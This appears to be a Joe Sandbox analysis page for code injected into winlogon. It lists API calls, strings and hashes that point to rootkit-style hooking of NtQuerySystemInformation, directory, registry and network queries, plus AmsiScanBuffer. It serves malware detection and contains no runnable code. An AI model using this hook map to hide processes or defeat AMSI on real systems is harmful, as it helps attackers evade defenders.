Associated: 00000026.00000002.2555098305.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\$cnt-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 2135414181-2609720707
Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction ID: 16a9fbc9ca01aa2ad8d01d5c7c5c6cd5cef1b3026fde7233e4cf92ec2729da17
Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction Fuzzy Hash: A7711637A51B5986FB119F65E8A0AD833A5FF84B8DF811111DE4D43B28DE3AC584C392

Function 000001CA7D1E1E74 Relevance: 43.8, APIs: 8, Strings: 17, Instructions: 95
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 000001CA7D1E1E7F

Part of subcall function 000001CA7D1E22A8: GetModuleHandleA.KERNEL32(?,?,?,000001CA7D1E1EB1), ref: 000001CA7D1E22C0
Part of subcall function 000001CA7D1E22A8: GetProcAddress.KERNEL32(?,?,?,000001CA7D1E1EB1), ref: 000001CA7D1E22D1

CreateThread.KERNELBASE ref: 000001CA7D1E2043
TlsAlloc.KERNEL32 ref: 000001CA7D1E2049
TlsAlloc.KERNEL32 ref: 000001CA7D1E2055
TlsAlloc.KERNEL32 ref: 000001CA7D1E2061
TlsAlloc.KERNEL32 ref: 000001CA7D1E206D
TlsAlloc.KERNEL32 ref: 000001CA7D1E2079
TlsAlloc.KERNEL32 ref: 000001CA7D1E2085

Strings

sechost.dll, xrefs: 000001CA7D1E1F99
NtResumeThread, xrefs: 000001CA7D1E1EC2
EnumServiceGroupW, xrefs: 000001CA7D1E1F50
AmsiScanBuffer, xrefs: 000001CA7D1E2012
NtEnumerateKey, xrefs: 000001CA7D1E1F19
pdh.dll, xrefs: 000001CA7D1E1FD7, 000001CA7D1E1FF8
NtQuerySystemInformation, xrefs: 000001CA7D1E1EA5
advapi32.dll, xrefs: 000001CA7D1E1F57, 000001CA7D1E1F78
NtQueryDirectoryFile, xrefs: 000001CA7D1E1EDF
amsi.dll, xrefs: 000001CA7D1E2019
NtQueryDirectoryFileEx, xrefs: 000001CA7D1E1EFC
EnumServicesStatusExW, xrefs: 000001CA7D1E1F71, 000001CA7D1E1F92
PdhGetRawCounterArrayW, xrefs: 000001CA7D1E1FD0
NtEnumerateValueKey, xrefs: 000001CA7D1E1F36
NtDeviceIoControlFile, xrefs: 000001CA7D1E1FB6
ntdll.dll, xrefs: 000001CA7D1E1E8D
PdhGetFormattedCounterArrayW, xrefs: 000001CA7D1E1FF1

Memory Dump Source

Source File: 00000026.00000002.2551471326.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000026.00000002.2550625621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2552462016.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2553296974.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2554151398.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2555098305.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
API String ID: 1735320900-4225371247
Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction ID: 28d763e4b3efa6897c284255733b152927e4241509441b1b3e99965525c9534b
Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction Fuzzy Hash: 115171B2E91B4EA5FB03DB64E860FD43322BF4074DFC00956A40942565EE7AC25AD3E3

Function 000001CA7D1EEF88 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(?,00000100,00000000,000001CA7D1EF34A,?,?,00000000,000001CA7D1EF2CD), ref: 000001CA7D1EEFF5
GetLastError.KERNEL32(?,?,00000000,000001CA7D1EF2CD), ref: 000001CA7D1EF007
LoadLibraryExW.KERNEL32(?,?,00000000,000001CA7D1EF2CD), ref: 000001CA7D1EF049
VirtualProtect.KERNELBASE ref: 000001CA7D1EF0A5
VirtualProtect.KERNEL32 ref: 000001CA7D1EF0D6
FreeLibrary.KERNEL32(?,?,00000000,000001CA7D1EF2CD), ref: 000001CA7D1EF11A
GetProcAddress.KERNEL32(?,?,00000000,000001CA7D1EF2CD), ref: 000001CA7D1EF126

Strings

api-ms-, xrefs: 000001CA7D1EF01B
AppPolicyGetProcessTerminationMethod, xrefs: 000001CA7D1EF157, 000001CA7D1EF165
ext-ms-, xrefs: 000001CA7D1EF02E

Memory Dump Source

Source File: 00000026.00000002.2551471326.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000026.00000002.2550625621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2552462016.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2553296974.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2554151398.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2555098305.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
API String ID: 740688525-1880043860
Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction ID: 75b8f92d8bfc56aebef74cbf69bbb5d49082de77f78bb49cf1e15368de41eb5e
Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction Fuzzy Hash: 91519C72B4170C51FA169B96A800BE57261BF48BB9FC847249E39473D4EF3AD505C783

Function 000001CA7D1E6270 Relevance: 9.2, APIs: 6, Instructions: 240
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 000001CA7D1E62AB
GetThreadContext.KERNEL32 ref: 000001CA7D1E6415

Part of subcall function 000001CA7D1E60A0: GetCurrentThreadId.KERNEL32 ref: 000001CA7D1E60A4

Memory Dump Source

Source File: 00000026.00000002.2551471326.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000026.00000002.2550625621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2552462016.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2553296974.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2554151398.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2555098305.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: 62de8192582035d3c174f7317d52215c3d31caf77dd5d103fa0b8274126801a3
Instruction ID: d05defe120a4688720ce9ecdd58902b16fb62d512cdd13eabecee864d7326d01
Opcode Fuzzy Hash: 62de8192582035d3c174f7317d52215c3d31caf77dd5d103fa0b8274126801a3
Instruction Fuzzy Hash: 1DD1CC37644B8C82FA71DB0AE49079A77A0F788B89F900512EACD47765DF3DC541CB82

Function 000001CA7D1E1E3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 000001CA7D1E1E47
GetProcAddress.KERNEL32 ref: 000001CA7D1E1E57
SleepEx.KERNELBASE ref: 000001CA7D1E1E67

Strings

AmsiScanBuffer, xrefs: 000001CA7D1E1E50
amsi.dll, xrefs: 000001CA7D1E1E40

Memory Dump Source

Source File: 00000026.00000002.2551471326.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000026.00000002.2550625621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2552462016.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2553296974.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2554151398.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2555098305.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: AddressLibraryLoadProcSleep
String ID: AmsiScanBuffer$amsi.dll
API String ID: 188063004-3248079830
Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction ID: 3f2b23ccba4f01efca1837d1ec0e5ebe98186c814f68ab41dbead1d3c470ee30
Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction Fuzzy Hash: FFD06272ED3708D5F90B6B51E8A4FD43262BF54B09FC50855C50E01264DE2EC659D3D3

Function 000001CA7D1E5810 Relevance: 7.8, APIs: 5, Instructions: 318
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 000001CA7D1E5896

Memory Dump Source

Source File: 00000026.00000002.2551471326.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000026.00000002.2550625621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2552462016.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2553296974.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2554151398.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2555098305.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 4460526132078707f03e529f17315c9f8621164f7a74e4fe9c23d362e9fa087d
Instruction ID: c4fb3315ca78ad6c88cc819d43d3822fc1bb5b5b3bb77f142309b4c7efaf3f70
Opcode Fuzzy Hash: 4460526132078707f03e529f17315c9f8621164f7a74e4fe9c23d362e9fa087d
Instruction Fuzzy Hash: A802F933659B8886F761CB15F49079AB7A0F7C4799F500015EA8E87BA8DF7DC484CB42

Function 000001CA7D1E3EC8 Relevance: 7.5, APIs: 5, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,000001CA7D1E3A5B), ref: 000001CA7D1E3EDB
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001CA7D1E3A5B), ref: 000001CA7D1E3F0E
VirtualProtectEx.KERNELBASE(?,?,?,?,?,000001CA7D1E3A5B), ref: 000001CA7D1E3F2E
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001CA7D1E3A5B), ref: 000001CA7D1E3F47
VirtualProtectEx.KERNELBASE(?,?,?,?,?,000001CA7D1E3A5B), ref: 000001CA7D1E3F68

Memory Dump Source

Source File: 00000026.00000002.2551471326.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000026.00000002.2550625621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2552462016.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2553296974.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2554151398.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2555098305.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction ID: 4b0ed5361dff3adcda6195a5dc2af1083a8005ab2c1b804d84ff7dccd2579ba4
Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction Fuzzy Hash: 72115E37A5574493FB268B61E404A9AB7B0FB44B89F440026DA4D43798EF7EC954C7C3

Function 000001CA7D1B2EBC Relevance: 6.2, APIs: 4, Instructions: 240memorylibraryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 000001CA7D1B2F7B
VirtualProtect.KERNELBASE ref: 000001CA7D1B2FA5
LoadLibraryA.KERNELBASE ref: 000001CA7D1B302E
VirtualProtect.KERNELBASE ref: 000001CA7D1B31C2

Memory Dump Source

Source File: 00000026.00000003.1759332183.000001CA7D1B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001CA7D1B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_3_1ca7d1b0000_winlogon.jbxd

Similarity

API ID: Virtual$Protect$AllocLibraryLoad
String ID:
API String ID: 3316853933-0
Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction ID: fab056db1c559ce614da3632ff79b2cd998d8c65ade00f4a8a9fe06968449f78
Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction Fuzzy Hash: B291F5B3F4139887EB558F29D400FA9B395FF55B98F9481249E4D07B88DA36D822C742

Function 000001CA7D1E4120 Relevance: 4.6, APIs: 3, Instructions: 64
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualQuery.KERNEL32 ref: 000001CA7D1E41A6
VirtualAlloc.KERNEL32 ref: 000001CA7D1E41E0

Memory Dump Source

Source File: 00000026.00000002.2551471326.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000026.00000002.2550625621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2552462016.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2553296974.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2554151398.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2555098305.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: Virtual$AllocQuery
String ID:
API String ID: 31662377-0
Opcode ID: a8802b86f0811ea88e9113a3d60b8cb8649c82089feb35d3c44dd7bdfe1e6621
Instruction ID: 31ae54dde4bc601838691571fe20e4d19e02a82357ab131b83e5d70d6c66b96e
Opcode Fuzzy Hash: a8802b86f0811ea88e9113a3d60b8cb8649c82089feb35d3c44dd7bdfe1e6621
Instruction Fuzzy Hash: BD317533A55B4981FA32CB65F050B8A72A4F78878DF900535E5CD46B94DF3EC1408B83

Function 000001CA7D1E3A1C Relevance: 4.5, APIs: 3, Instructions: 39
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 000001CA7D1E3A35
PathFindFileNameW.SHLWAPI ref: 000001CA7D1E3A44

Part of subcall function 000001CA7D1E3F88: StrCmpNIW.SHLWAPI(?,?,?,000001CA7D1E272F), ref: 000001CA7D1E3FA0

Part of subcall function 000001CA7D1E3EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,000001CA7D1E3A5B), ref: 000001CA7D1E3EDB
Part of subcall function 000001CA7D1E3EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000001CA7D1E3A5B), ref: 000001CA7D1E3F0E
Part of subcall function 000001CA7D1E3EC8: VirtualProtectEx.KERNELBASE(?,?,?,?,?,000001CA7D1E3A5B), ref: 000001CA7D1E3F2E
Part of subcall function 000001CA7D1E3EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000001CA7D1E3A5B), ref: 000001CA7D1E3F47
Part of subcall function 000001CA7D1E3EC8: VirtualProtectEx.KERNELBASE(?,?,?,?,?,000001CA7D1E3A5B), ref: 000001CA7D1E3F68

CreateThread.KERNELBASE ref: 000001CA7D1E3A8B

Part of subcall function 000001CA7D1E1E74: GetCurrentThread.KERNEL32 ref: 000001CA7D1E1E7F
Part of subcall function 000001CA7D1E1E74: CreateThread.KERNELBASE ref: 000001CA7D1E2043
Part of subcall function 000001CA7D1E1E74: TlsAlloc.KERNEL32 ref: 000001CA7D1E2049
Part of subcall function 000001CA7D1E1E74: TlsAlloc.KERNEL32 ref: 000001CA7D1E2055
Part of subcall function 000001CA7D1E1E74: TlsAlloc.KERNEL32 ref: 000001CA7D1E2061
Part of subcall function 000001CA7D1E1E74: TlsAlloc.KERNEL32 ref: 000001CA7D1E206D
Part of subcall function 000001CA7D1E1E74: TlsAlloc.KERNEL32 ref: 000001CA7D1E2079
Part of subcall function 000001CA7D1E1E74: TlsAlloc.KERNEL32 ref: 000001CA7D1E2085

Memory Dump Source

Source File: 00000026.00000002.2551471326.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000026.00000002.2550625621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2552462016.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2553296974.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2554151398.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2555098305.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
String ID:
API String ID: 2779030803-0
Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
Instruction ID: 5a3ca2a828a2f69e8ddffaa21c5641dcb192bd3c096c6af3b0a23b43865aa00f
Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
Instruction Fuzzy Hash: FD116937E9070982FB66A722A549FE932A0BF84B4FFC000199406C11D0EF3BC58587D3

Function 000001CA7D1E5530 Relevance: 4.5, APIs: 3, Instructions: 23
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 000001CA7D1E5534
VirtualProtect.KERNEL32 ref: 000001CA7D1E5577
FlushInstructionCache.KERNEL32 ref: 000001CA7D1E558C

Memory Dump Source

Source File: 00000026.00000002.2551471326.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000026.00000002.2550625621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2552462016.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2553296974.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2554151398.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2555098305.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: CacheCurrentFlushInstructionProcessProtectVirtual
String ID:
API String ID: 3733156554-0
Opcode ID: 50caac35bfbc2d5f59ac81492b3b3ec34dc9555305fb9744858cadce20ffe8b5
Instruction ID: d66c06046afa48536f3f5d6c761f082350603e171004f0d7298866914a91c0bf
Opcode Fuzzy Hash: 50caac35bfbc2d5f59ac81492b3b3ec34dc9555305fb9744858cadce20ffe8b5
Instruction Fuzzy Hash: BAF01237658B4880F6319B05E451B8A77A1FB887D9F544111BACD07769CA3AC580CB82

Function 000001CA7D1E1BC4 Relevance: 1.6, APIs: 1, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000001CA7D1E1724: GetProcessHeap.KERNEL32 ref: 000001CA7D1E172F
Part of subcall function 000001CA7D1E1724: HeapAlloc.KERNEL32 ref: 000001CA7D1E173E
Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E17AE
Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E17DB
Part of subcall function 000001CA7D1E1724: RegCloseKey.ADVAPI32 ref: 000001CA7D1E17F5
Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E1815
Part of subcall function 000001CA7D1E1724: RegCloseKey.KERNELBASE ref: 000001CA7D1E1830
Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E1850
Part of subcall function 000001CA7D1E1724: RegCloseKey.ADVAPI32 ref: 000001CA7D1E186B
Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E188B
Part of subcall function 000001CA7D1E1724: RegCloseKey.ADVAPI32 ref: 000001CA7D1E18A6
Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E18C6

SleepEx.KERNELBASE ref: 000001CA7D1E1BDF

Part of subcall function 000001CA7D1E1724: RegCloseKey.ADVAPI32 ref: 000001CA7D1E18E1
Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E1901
Part of subcall function 000001CA7D1E1724: RegCloseKey.ADVAPI32 ref: 000001CA7D1E191C
Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E193C
Part of subcall function 000001CA7D1E1724: RegCloseKey.ADVAPI32 ref: 000001CA7D1E1957
Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E1977
Part of subcall function 000001CA7D1E1724: RegCloseKey.ADVAPI32 ref: 000001CA7D1E1992
Part of subcall function 000001CA7D1E1724: RegCloseKey.KERNELBASE ref: 000001CA7D1E199C

Memory Dump Source

Source File: 00000026.00000002.2551471326.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000026.00000002.2550625621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2552462016.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2553296974.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2554151398.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2555098305.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: CloseOpen$Heap$AllocProcessSleep
String ID:
API String ID: 948135145-0
Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
Instruction ID: 7242aede8837696ec19541534e1c3dce86efc3bfd9bee90a47d931ad18d557f5
Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
Instruction Fuzzy Hash: D5312177A8070941FB529B22E940BE933A5BF44BC9F8A44618E0AC7295EE12C4D093F7

Function 000001CA7D21F370 Relevance: 1.5, APIs: 1, Instructions: 11
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 000001CA7D21F390

Memory Dump Source

Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
Instruction ID: 96736f0284182aa4837be0ebcb41d10c413a553dbe389820e9d30482321e3cc7
Opcode Fuzzy Hash: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
Instruction Fuzzy Hash: CFD0C936B3164483F3019B11D845BD56228BB98705FC04005E949826948F7DC25ACB92

Function 000001CA7D1EF370 Relevance: 1.5, APIs: 1, Instructions: 11
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 000001CA7D1EF390

Memory Dump Source

Source File: 00000026.00000002.2551471326.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000026.00000002.2550625621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2552462016.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2553296974.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2554151398.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2555098305.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
Instruction ID: bead2ac1358e17f089f294fb4c756c1d3e3800fd4e757aed294e48ae8c095ac3
Opcode Fuzzy Hash: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
Instruction Fuzzy Hash: 58D01236B32644C3F301DB51D855BD67729FB98705FC04005E94982694DF7DC259CF92

Non-executed Functions

Function 000001CA7D212FF0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 256stringlibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 000001CA7D213094
lstrlenW.KERNEL32 ref: 000001CA7D2132BE

Part of subcall function 000001CA7D211A30: OpenProcess.KERNEL32 ref: 000001CA7D211A56
Part of subcall function 000001CA7D211A30: K32GetModuleFileNameExW.KERNEL32 ref: 000001CA7D211A74
Part of subcall function 000001CA7D211A30: PathFindFileNameW.SHLWAPI ref: 000001CA7D211A83
Part of subcall function 000001CA7D211A30: lstrlenW.KERNEL32 ref: 000001CA7D211A8F
Part of subcall function 000001CA7D211A30: StrCpyW.SHLWAPI ref: 000001CA7D211AA2
Part of subcall function 000001CA7D211A30: CloseHandle.KERNEL32 ref: 000001CA7D211AB0

GetProcAddress.KERNEL32 ref: 000001CA7D2130A9

Part of subcall function 000001CA7D213F88: StrCmpNIW.SHLWAPI(?,?,?,000001CA7D21272F), ref: 000001CA7D213FA0

StrCmpNIW.SHLWAPI ref: 000001CA7D2130EC
